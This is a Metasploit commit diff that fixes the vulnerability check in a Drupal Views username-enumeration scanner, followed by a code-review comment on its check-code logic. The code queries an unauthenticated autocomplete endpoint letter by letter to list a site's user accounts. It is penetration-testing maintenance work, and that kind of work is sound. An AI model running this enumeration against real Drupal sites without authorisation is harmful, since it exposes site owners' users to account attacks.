Land #3990, @wchen-r7's fix for #3984, a busted check in drupal_views_user_enum

bug/bundler_fix
Jon Hart 2014-10-12 19:38:55 -07:00
commit d51d2bf5a0
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 13 additions and 19 deletions


@ -35,11 +35,15 @@ class Metasploit3 < Msf::Auxiliary
register_options( register_options(
[ [
OptString.new('PATH', [true, "Drupal Path", "/"]) OptString.new('TARGETURI', [true, "Drupal Path", "/"])
], self.class) ], self.class)
end end
def check(base_uri) def base_uri
@base_uri ||= "#{normalize_uri(target_uri.path)}?q=admin/views/ajax/autocomplete/user/"
end
def check_host(ip)
res = send_request_cgi({ res = send_request_cgi({
'uri' => base_uri, 'uri' => base_uri,
'method' => 'GET', 'method' => 'GET',
@ -47,31 +51,21 @@ class Metasploit3 < Msf::Auxiliary
}, 25) }, 25)
if not res if not res
return false return Exploit::CheckCode::Unknown
elsif res and res.body =~ /\<title\>Access denied/ elsif res and res.body =~ /\<title\>Access denied/
# This probably means the Views Module actually isn't installed # This probably means the Views Module actually isn't installed
print_error("#{rhost} - Access denied") vprint_error("#{rhost} - Access denied")
return false return Exploit::CheckCode::Safe
elsif res and res.message != 'OK' or res.body != '[ ]' elsif res and res.message != 'OK' or res.body != '[ ]'
return false return Exploit::CheckCode::Safe
else else
return true return Exploit::CheckCode::Appears
end end
end end
def run_host(ip) def run_host(ip)
# Make sure the URIPATH begins with '/'
datastore['PATH'] = normalize_uri(datastore['PATH'])
# Make sure the URIPATH ends with /
if datastore['PATH'][-1,1] != '/'
datastore['PATH'] = datastore['PATH'] + '/'
end
enum_uri = datastore['PATH'] + "?q=admin/views/ajax/autocomplete/user/"
# Check if remote host is available or appears vulnerable # Check if remote host is available or appears vulnerable
if not check(enum_uri) unless check_host(ip) == Exploit::CheckCode::Appears
print_error("#{ip} does not appear to be vulnerable, will not continue") print_error("#{ip} does not appear to be vulnerable, will not continue")
return return
end end
@ -83,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("Iterating on letter: #{l}") vprint_status("Iterating on letter: #{l}")
res = send_request_cgi({ res = send_request_cgi({
'uri' => enum_uri+l, 'uri' => base_uri+l,
'method' => 'GET', 'method' => 'GET',
'headers' => { 'Connection' => 'Close' } 'headers' => { 'Connection' => 'Close' }
}, 25) }, 25)
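Review bot: In `check_host`, the branch `elsif res and res.message != 'OK' or res.body != '[ ]'` now returns `Exploit::CheckCode::Safe` for every non-200 reply, so a redirect or server error is reported as a confirmed negative rather than an inconclusive result. This matters more after the change because the new `base_uri` no longer forces the trailing slash that the removed `run_host` lines added before `?q=`; a TARGETURI without one may, depending on the server, be answered with a redirect, which this branch then labels Safe. I would split the branch into `elsif res.code != 200` returning `Exploit::CheckCode::Unknown` and a separate `elsif res.body != '[ ]'` returning `Exploit::CheckCode::Safe`, which also removes the mixed `and`/`or` precedence. In `run_host`, "does not appear to be vulnerable" is also printed when `check_host` returned Unknown because there was no response, so anyone reading the output cannot tell an unreachable host from a negative result. The rest of `run_host` lies outside the visible hunks.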